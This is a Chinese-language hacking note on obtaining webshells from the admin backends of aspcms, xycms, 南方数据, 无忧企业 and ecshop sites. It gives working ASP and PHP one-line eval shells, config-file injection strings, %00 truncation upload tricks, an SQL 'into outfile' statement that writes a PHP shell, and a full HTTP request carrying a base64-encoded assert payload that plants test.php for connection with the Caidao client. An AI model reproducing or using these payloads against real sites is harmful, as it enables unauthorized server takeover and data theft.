插入asp文件拿webshell
新建文件 拿webshell
上传文件拿wenshell
编辑html 拿webshell
备份数据库拿webshell
1. aspcms后台
aspcms默认的数据库备份路径为data/#5Dp8Gh.asp,所以路径为http://www.aspcms.com/data/%235Dp8Gh.asp。
此时可以往数据库中插入编码一句话。因此来到扩展功能中的数据库备份中。
首先将数据库马随便插入到管理中心的某篇文章的内容或者标题中,马为:
┼攠數畣整爠煥敵瑳∨≡┩愾 密码为a
然后备份数据库,接着再还原数据库,此时再访问http://www.aspcms.com/data/%235Dp8Gh.asp,里面就会出现ÀàÐͲ»Æ¥Åä: 'execute'(在下面),说明插入成功。然后菜刀连接即可。
2. xycms后台
配置文件拿webshell.一般asp的网站中,配置文件在/inc/config.asp中。
进入后台后,点击系统设置,将特殊的一句话插入到里面
"%><%eval request("d")%><%s="
闭合前面,也要闭合后面的符号,否则内容就会出错。
3. 南方数据后台(asp)
其数据库备份是固定的,所以没法拿shell。
在上传logo中,上传图片马,如果中间件为iis6.0,那么结合一下%00截断就行。
4. 无忧企业后台
第一种方法: 添加新闻内容,然后插入图片马,然后将图片马的文件路径记录下来,然后转到数据库备份。如果路径是不可修改的,那么可以通过更改前端的代码使得其变成可输入。然后将当前的数据路径改成图片马的位置,然后备份的数据库名称也改成asp结尾的文件,这样就拿到webshell。
如果数据库的路径更改后依旧没法备份,即路径是锁死的,那么可以尝试插入数据库一句话(即aspcms的插入方法)
第二种方法: 配置文件插入
第三种方法: 由于可以在配置文件的那一栏中更改文件的上传类型,所以可以改成php,然后直接传马即可
5. ecshop后台拿shell
第一种方法: 后台有数据库管理,可以执行sql语句。如果后台有关键字拦截过滤就算。(不知道from/to_base64编码是否可以)
select '<?php eval($_POST[cmd])?>' into outfile 'E:/phpStudy/PHPTutorial/WWW/www.ecshop36.com/ecshop/moon.php'
其次是在数据库备份中,自定义时由于备份文件改名字后面会自动添加.sql后缀,如果搭建的环境是iis6.0,那么可以抓包使用%00截断,然后将数据库一句话插入进去即可。
第二种方法: 代码执行拿webshell(原理待补充)
访问/admin/order.php?act=edit_templates,抓包,在burpsuite中将传输的方法从get转成post,然后记得把转换后将act参数从post改成get,然后在结尾加上指定的马。数据包如下例所示:
1 POST /admin/order.php?act=edit_templates HTTP/1.1 2 Host: www.ecshop36.com 3 Upgrade-Insecure-Requests: 1 4 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 6 Accept-Language: zh-CN,zh;q=0.9 7 Cookie: ECS[history]=72; ECS_ID=bed16770fcef0b6457fd0420bf3a484ce2a1f137; ECS[visit_times]=3; ECSCP_ID=36cb3b117e1f9f05fd562c92f7ea372bdeb1e389 8 Connection: close 9 Content-Type: application/x-www-form-urlencoded 10 Content-Length: 18 11 12 13 14 FCKeditor1={$u'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3Rlc3QucGhwJyxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBZ1FHVjJZV3dvSkY5UVQxTlVXeWRoSjEwcE96OCsnKSk7==')); //_var['}<?
生成的为test.php,密码为a。上传成功后,在订单列表里面随便找个订单然后打印订单,随后木马生成,即可用菜刀连接:/admin/test.php。
